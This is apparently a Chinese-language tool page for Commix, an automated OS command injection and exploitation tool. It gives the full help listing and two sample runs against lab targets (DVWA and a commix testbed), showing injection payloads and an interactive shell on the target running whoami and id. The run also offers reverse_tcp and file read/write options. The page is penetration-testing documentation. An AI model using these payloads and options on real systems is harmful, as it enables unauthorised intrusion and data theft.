Commix 介绍

混合(简称[comm]和[i]njection e[x]ploiter)有一个简单的环境,它可以被使用,从web开发人员,渗透测试人员甚至安全研究人员测试web应用程序的视图找到错误,错误或漏洞相关命令注入攻击。通过使用这个工具,很容易找到和利用一个命令注入漏洞在某种脆弱的参数或字符串。混合是用Python编程语言写的。

作者:Anastasios Stasinopoulos
证书:GPL v3

工具来源 主页
Kali commix Repo 仓库
Kali commix Package

commix - 自动化一体化操作系统命令注入和开发工具

root@kali:~# commix -h
Usage: python commix.py [option(s)]

Options:
  -h, --help  Show help and exit.

  General:
    These options relate to general matters.

    -v VERBOSE:  Verbosity level (0-4, Default: 0).
    --version:   Show version number and exit.
    --output-dir=OUT..   Set custom output directory path.
    -s SESSION_FILE:  Load session from a stored (.sqlite) file.
    --flush-session:  Flush session files for current target.
    --ignore-session:  Ignore results stored in session file.
    -t TRAFFIC_FILE:  Log all HTTP traffic into a textual file.
    --batch   Never ask for user input, use the default behaviour.

  Target:
    This options has to be provided, to define the target URL.

    -u URL, --url=URL:   Target URL.
    --url-reload:   Reload target URL after command execution.
    -l LOGFILE:   Parse target from HTTP proxy log file.
    -m BULKFILE:   Scan multiple targets given in a textual file.
    -r REQUESTFILE:   Load HTTP request from a file.
    --crawl=CRAWLDEPTH:  Crawl the website starting from the target URL (1-2,
                        Default: 0).
    -x SITEMAP_URL:  Parse target(s) from remote sitemap(.xml) file.

  Request:
    These options can be used to specify how to connect to the target URL.

    --data=DATA:  Data string to be sent through POST.
    --host=HOST:  HTTP Host header.
    --referer=REFERER:   HTTP Referer header.
    --user-agent=AGENT:  HTTP User-Agent header.
    --random-agent:    Use a randomly selected HTTP User-Agent header.
    --param-del=PDEL:    Set character for splitting parameter values.
    --cookie=COOKIE:     HTTP Cookie header.
    --cookie-del=CDEL:   Set character for splitting cookie values.
    --headers=HEADERS:   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
    --proxy=PROXY:     Use a HTTP proxy (e.g. '127.0.0.1:8080').
    --tor:         Use the Tor network.
    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).
    --auth-url=AUTH_..  Login panel URL.
    --auth-data=AUTH..  Login parameters and data.
    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').
    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').
    --ignore-401      Ignore HTTP error 401 (Unauthorized).
    --force-ssl       Force usage of SSL/HTTPS.

  Enumeration:
    These options can be used to enumerate the target host.

    --all            Retrieve everything.
    --current-user      Retrieve current user name.
    --hostname        Retrieve current hostname.
    --is-root         Check if the current user have root privileges.
    --is-admin        Check if the current user have admin privileges.
    --sys-info        Retrieve system information.
    --users          Retrieve system users.
    --passwords        Retrieve system users password hashes.
    --privileges       Retrieve system users privileges.
    --ps-version       Retrieve PowerShell's version number.

  File access:
    These options can be used to access files on the target host.

    --file-read=FILE..  Read a file from the target host.
    --file-write=FIL..  Write to a file on the target host.
    --file-upload=FI..  Upload a file on the target host.
    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.

  Modules:
    These options can be used increase the detection and/or injection
    capabilities.

    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.
                    (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
    --dns-server=DNS..  The 'DNS exfiltration' injection module.
                    (Domain name used for DNS exfiltration attack).
    --shellshock      The 'shellshock' injection module.

  Injection:
    These options can be used to specify which parameters to inject and to
    provide custom injection payloads.

    -p TEST_PARAMETER   Testable parameter(s).
    --suffix=SUFFIX     Injection payload suffix string.
    --prefix=PREFIX     Injection payload prefix string.
    --technique=TECH    Specify injection technique(s) to use.
    --maxlen=MAXLEN     Set the max length of output for time-related
                        injection techniques (Default: 10000 chars).
    --delay=DELAY       Set custom time delay for time-related injection
                        techniques (Default: 1 sec).
    --tmp-path=TMP_P..   Set the absolute path of web server's temp directory.
    --root-dir=SRV_R..   Set the absolute path of web server's root directory.
    --alter-shell=AL..   Use an alternative os-shell (e.g. 'Python').
    --os-cmd=OS_CMD     Execute a single operating system command.
    --os=OS          Force back-end operating system to this value.
    --tamper=TAMPER     Use given script(s) for tampering injection data.
    --msf-path=MSF_P..   Set a local path where metasploit is installed.

  Detection:
    These options can be used to customize the detection phase.

    --level=LEVEL       Level of tests to perform (1-3, Default: 1).
    --skip-calc        Skip the mathematic calculation during the detection
                        phase.
    --skip-empty       Skip testing the parameter(s) with empty value(s).

  Miscellaneous:
    --dependencies      Check for third-party (non-core) dependencies.
    --skip-waf        Skip heuristic detection of WAF/IPS/IDS protection.
    --offline         Work in offline mode.

root@kali:~#

Commix 用法示例

root@kali:~# commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ \
>   --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' \
>   --data='ip=INJECT_HERE&Submit=Submit'
                          __          
   ___  ___   ___ ___   ___ ___ /\_\  __ _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/
v1.7-stable
(@commixproject)
{ v0.3b-nongit-20160104 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)
+--
(*) Checking connection to the target URL... [ SUCCEED ]
(^) Warning: Heuristics have failed to identify server's operating system.
(?) Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > w
(*) Setting the (POST) 'ip' parameter for tests.
(^) Warning: Due to the relatively slow response of 'cmd.exe' there may be delays during the data extraction procedure.
(*) Testing the classic injection technique... [ SUCCEED ]
(!) The (POST) 'ip' parameter is vulnerable to Results-based Command Injection.
  (+) Type : Results-based Command Injection
  (+) Technique : Classic Injection Technique
  (+) Payload : %26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA <nul

(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami

nt authority\iusr

commix(os_shell) >

尝试爆破一个网站(-url ="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php”)使用最高的测试水平(-level= 3):

root@kali:~# commix --url="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php" --level=3
                          __          
   ___  ___   ___ ___   ___ ___ /\_\  __ _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/
v1.7-stable
(@commixproject)
{ v0.3b-nongit-20160104 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst)
+--
[*] Checking connection to the target URL... [ SUCCEED ]
[*] Setting the HTTP header User-Agent for tests.
[*] Testing the (results-based) classic command injection technique... [ FAILED ]
[*] Testing the (results-based) dynamic code evaluation technique... [ FAILED ]
[*] Testing the (blind) time-based command injection technique... [ FAILED ]
[*] Trying to create a file in '/var/www/html/commix-testbed/scenarios/referer/'...
[!] Warning: It seems that you don't have permissions to read and/or write files in '/var/www/html/commix-testbed/scenarios/referer/'.
[?] Do you want to try the temporary directory (/tmp/) [Y/n] > Y
[*] Trying to create a file, in temporary directory (/tmp/)...
[*] Testing the (semi-blind) tempfile-based injection technique... [ FAILED ]
[!] Warning: The tested HTTP header User-Agent seems to be not injectable.
[*] Setting the HTTP header Referer for tests.
[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The HTTP header Referer seems injectable via (results-based) classic command injection technique.
    [~] Payload: ';echo KSXTLU$((18+64))$(echo KSXTLU)KSXTLU'

[?] Do you want a Pseudo-Terminal shell? [Y/n] > Y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > ?

  ---[ Available options ]---
  Type '?' to get all the available options.
  Type 'back' to move back from the current context.
  Type 'quit' (or use <Ctrl-C>) to quit commix.
  Type 'reverse_tcp' to get a reverse TCP connection.
  Type 'bind_tcp' to set a bind TCP connection.

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls

index.html referer(blind).php referer(classic).php referer(eval).php

commix(os_shell) > quit

root@kali:~#